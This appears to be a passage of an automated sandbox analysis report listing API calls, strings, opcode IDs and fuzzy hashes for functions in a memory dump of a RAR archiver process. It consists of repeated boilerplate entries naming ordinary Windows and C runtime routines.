                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3116915952-0
                                                                                                                                                                                                                                        • Opcode ID: b50682ea8b281155ee065a764beae75b9f37a97ff4cffd0bdd8a4d9240ecf0c6
                                                                                                                                                                                                                                        • Instruction ID: 2ad2a5b321c565e63700096f8b1e5adb779d889b40abf431a77731e74dd94f89
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b50682ea8b281155ee065a764beae75b9f37a97ff4cffd0bdd8a4d9240ecf0c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17E16326A1AA82E1EB22EB25D4501FD63A5FF89B84F4540B3DE4D87796DE3CD907C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,00007FF6AA1A11B0,?,?,?,00000000,?,?,00007FF6AA19F30F,00000000,00007FF6AA186380,?,00007FF6AA182EC8), ref: 00007FF6AA1A3AC4
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,00007FF6AA1A11B0,?,?,?,00000000,?,?,00007FF6AA19F30F,00000000,00007FF6AA186380,?,00007FF6AA182EC8), ref: 00007FF6AA1A3B0A
                                                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00007FF6AA1A3B55
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00007FF6AA1A11B0,?,?,?,00000000,?,?,00007FF6AA19F30F,00000000,00007FF6AA186380,?,00007FF6AA182EC8), ref: 00007FF6AA1A3B60
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 998109204-0
                                                                                                                                                                                                                                        • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                        • Instruction ID: a740b9073bda232986be3210b77674d34ac57c60ed5feaa72f9f48222ef55186
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B318136619B81D6E7608F11B44469A77A5FB887E4F004336EAA943BD4DF3CD9568B00
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: CMT
                                                                                                                                                                                                                                        • API String ID: 0-2756464174
                                                                                                                                                                                                                                        • Opcode ID: a16dee74380204c9c30fa4e199fe9bf2e4989a6c72111b3352134e7331b26900
                                                                                                                                                                                                                                        • Instruction ID: ac1e8b54c6d729dcbb051c20439081ed94d0576b99339f4e35f92658e796e7a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a16dee74380204c9c30fa4e199fe9bf2e4989a6c72111b3352134e7331b26900
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77D1D562A1A692E1EA22DB25D4501BD63A1FF89BC0F4445B3DA5E877D9DF3CE943C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AA1E8704
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1E4E3C: GetCurrentProcess.KERNEL32(00007FF6AA1E9CC5), ref: 00007FF6AA1E4E69
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                        • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                        • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                        • Instruction ID: 40ab94ce6a2a5e42b8a07fa182282d563d120987439694395325dbc073f9e64a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4251F362F16A95D5EB22DFA298004BC67A5FB4ABD8B444532DE4D97F85DF3CD8428300
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
• Instruction ID: 9657c3d8a706b2c8c94c151d13b363c4717d2df711ab857e8792b2359d5ed842
• Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
• Instruction Fuzzy Hash: F4111672B14641DAEB108FB6E8912AE7BB0FB48748F40153ADA8E93A58DF3CD545CB04
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
• Instruction ID: 8c9895fb446368f5a831919edaa5eef8d3e6f8108df031b23380852662320aa0
• Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
• Instruction Fuzzy Hash: E9F05421B08781D7E3118F16B54011AE7A4FF85BD4F048175EA8993B58DF7CC9528704
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
• Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
• Instruction ID: 0eab96005cf1572ec36766762bf72370391e0c0f7d11bcd0182ff83520347625
• Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
• Instruction Fuzzy Hash: D8014C72629681D7EB71DB15E4513AAB3A1FB84744F800572E68CC2688DF3CEA0ACF40
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
• Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction ID: 46e5c70b22f794b8bd3625baed61c06048e66baba98430e4d9606cd2bd3c2322
• Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction Fuzzy Hash: F941BD32B0AB85E9E712CF64E8417AD37A4EB05398F40417BEE5C87B95DE3CD8268344
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: Console$Mode$Handle$Readfflush
• String ID:
• API String ID: 1039280553-0
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ExceptionThrowstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 932687459-0
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: ;%u$x%u$xc%u
• API String ID: 233258989-2277559157
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: FileMoveNamePath$CompareLongShortStringswprintf
• String ID: rtmp%d
• API String ID: 2308737092-3303766350
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: CloseCreateEventHandle$ErrorLast
• String ID: rar -ioff
• API String ID: 4151682896-4089728129
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                        • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                        • API String ID: 667068680-1824683568
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: +$-
                                                                                                                                                                                                                                        • API String ID: 3215553584-2137968064
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Backup$Read$Seek$wcschr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2092471728-0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2092733347-0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2092733347-0
                                                                                                                                                                                                                                        • Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                        • Instruction ID: 9f38b388252a4c9fcc8a26f3cc34f716d8ce13f42c027591e3ecc1e7c735e76a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F313862B15651DAEB01CFB4D8901AC3774FF08B48B54502BEE0E97A68EF38D996C314
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                                        • API String ID: 0-13699710
                                                                                                                                                                                                                                        • Opcode ID: b327c31f0af7d37da6402c75e015e29487d24a11651d10baa52d84966eddba00
                                                                                                                                                                                                                                        • Instruction ID: 8689b3ab021dc8b8ec8822669e5406e16c8e88896c55f3f5fbb9634343fc70da
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b327c31f0af7d37da6402c75e015e29487d24a11651d10baa52d84966eddba00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50818221A0A682E5EA22EB25D4112F91792FF85784F4042B7D94D8B7CBDF6DEE07C340
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                                        • String ID: csm$f
                                                                                                                                                                                                                                        • API String ID: 3913153233-629598281
                                                                                                                                                                                                                                        • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                        • Instruction ID: a5d08a77f05111895403c82670338dd948e49b8ca15788dd6440c10e1e3aaa44
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9561DF36B0A242EAEB16DB25E444E7927D9FB44B85F148576DE0A87788DF38EC42C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
